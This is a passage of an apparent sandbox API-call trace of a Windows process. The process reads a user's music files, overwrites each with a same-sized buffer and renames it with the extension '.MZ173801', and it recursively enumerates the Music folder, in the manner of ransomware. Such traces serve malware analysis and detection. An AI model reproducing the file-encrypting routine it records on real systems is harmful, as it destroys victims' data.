lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0116.648] GetCurrentThreadId () returned 0x1358 [0116.648] GetCurrentThreadId () returned 0x1358 [0116.648] GetCurrentThreadId () returned 0x1358 [0116.648] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.648] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0116.649] GetCurrentThreadId () returned 0x1358 [0116.649] GetCurrentThreadId () returned 0x1358 [0116.649] GetCurrentThreadId () returned 0x1358 [0116.649] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\hhHYj9Pnudi.mp3" (normalized: "c:\\users\\fd1hvy\\music\\hhhyj9pnudi.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f0 [0116.649] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0116.649] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0116.649] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3988 [0116.649] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0116.649] ReadFile (in: hFile=0x3f0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x3988, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x3988, lpOverlapped=0x0) returned 1 [0116.650] CloseHandle (hObject=0x3f0) returned 1 [0116.650] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\hhHYj9Pnudi.mp3" (normalized: "c:\\users\\fd1hvy\\music\\hhhyj9pnudi.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f0 [0116.651] WriteFile (in: hFile=0x3f0, lpBuffer=0x2435b60*, nNumberOfBytesToWrite=0x3988, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2435b60*, lpNumberOfBytesWritten=0x19f9bc*=0x3988, lpOverlapped=0x0) returned 1 [0116.652] CloseHandle (hObject=0x3f0) returned 1 [0116.653] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\hhHYj9Pnudi.mp3" (normalized: "c:\\users\\fd1hvy\\music\\hhhyj9pnudi.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\hhHYj9Pnudi.mp3.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\hhhyj9pnudi.mp3.mz173801")) returned 1 [0116.654] GetCurrentThreadId () returned 0x1358 [0116.654] GetCurrentThreadId () returned 0x1358 [0116.654] GetCurrentThreadId () returned 0x1358 [0116.654] GetCurrentThreadId () returned 0x1358 [0116.654] GetCurrentThreadId () returned 0x1358 [0116.654] GetCurrentThreadId () returned 0x1358 [0116.654] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c22ad20, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe24d7270, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0xe24d7270, ftLastWriteTime.dwHighDateTime=0x1d5e98b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="stszJlZAZD-p", cAlternateFileName="STSZJL~1")) returned 1 [0116.654] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c22ad20, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe24d7270, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0xe24d7270, ftLastWriteTime.dwHighDateTime=0x1d5e98b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="stszJlZAZD-p", cAlternateFileName="STSZJL~1")) returned 0 [0116.654] GetLastError () returned 0x12 [0116.654] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0116.654] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa6ce1567, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa6ce1567, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0116.654] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0116.654] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.654] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa6ce1567, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa6ce1567, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.655] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.655] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.655] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e2216c0, ftCreationTime.dwHighDateTime=0x1d5eca9, ftLastAccessTime.dwLowDateTime=0x42662c70, ftLastAccessTime.dwHighDateTime=0x1d5ee59, ftLastWriteTime.dwLowDateTime=0xa6a09766, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x101e2, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="5luLU8SfxcLf3.mp3.MZ173801", cAlternateFileName="5LULU8~1.MZ1")) returned 1 [0116.655] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.655] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.655] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a017930, ftCreationTime.dwHighDateTime=0x1d5e3f6, ftLastAccessTime.dwLowDateTime=0x458c4710, ftLastAccessTime.dwHighDateTime=0x1d5e934, ftLastWriteTime.dwLowDateTime=0x458c4710, ftLastWriteTime.dwHighDateTime=0x1d5e934, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="5xR3", cAlternateFileName="")) returned 1 [0116.655] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.655] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.655] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a017930, ftCreationTime.dwHighDateTime=0x1d5e3f6, ftLastAccessTime.dwLowDateTime=0x458c4710, ftLastAccessTime.dwHighDateTime=0x1d5e934, ftLastWriteTime.dwLowDateTime=0x458c4710, ftLastWriteTime.dwHighDateTime=0x1d5e934, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bb60 [0116.655] FindNextFileW (in: hFindFile=0xa1bb60, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a017930, ftCreationTime.dwHighDateTime=0x1d5e3f6, ftLastAccessTime.dwLowDateTime=0x458c4710, ftLastAccessTime.dwHighDateTime=0x1d5e934, ftLastWriteTime.dwLowDateTime=0x458c4710, ftLastWriteTime.dwHighDateTime=0x1d5e934, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0116.655] FindNextFileW (in: hFindFile=0xa1bb60, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1bb5190, ftCreationTime.dwHighDateTime=0x1d5e37e, ftLastAccessTime.dwLowDateTime=0xc51fbb40, ftLastAccessTime.dwHighDateTime=0x1d5e84b, ftLastWriteTime.dwLowDateTime=0xc51fbb40, ftLastWriteTime.dwHighDateTime=0x1d5e84b, nFileSizeHigh=0x0, nFileSizeLow=0x9e83, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="Q2PT-p_KEzetPwQd hO2.wav", cAlternateFileName="Q2PT-P~1.WAV")) returned 1 [0116.655] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0116.655] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.655] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\Q2PT-p_KEzetPwQd hO2.wav" (normalized: "c:\\users\\fd1hvy\\music\\5xr3\\q2pt-p_kezetpwqd ho2.wav"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1bb5190, ftCreationTime.dwHighDateTime=0x1d5e37e, ftLastAccessTime.dwLowDateTime=0xc51fbb40, ftLastAccessTime.dwHighDateTime=0x1d5e84b, ftLastWriteTime.dwLowDateTime=0xc51fbb40, ftLastWriteTime.dwHighDateTime=0x1d5e84b, nFileSizeHigh=0x0, nFileSizeLow=0x9e83)) returned 1 [0116.656] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.657] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0116.657] GetCurrentThreadId () returned 0x1358 [0116.657] GetCurrentThreadId () returned 0x1358 [0116.657] GetCurrentThreadId () returned 0x1358 [0116.657] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.657] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5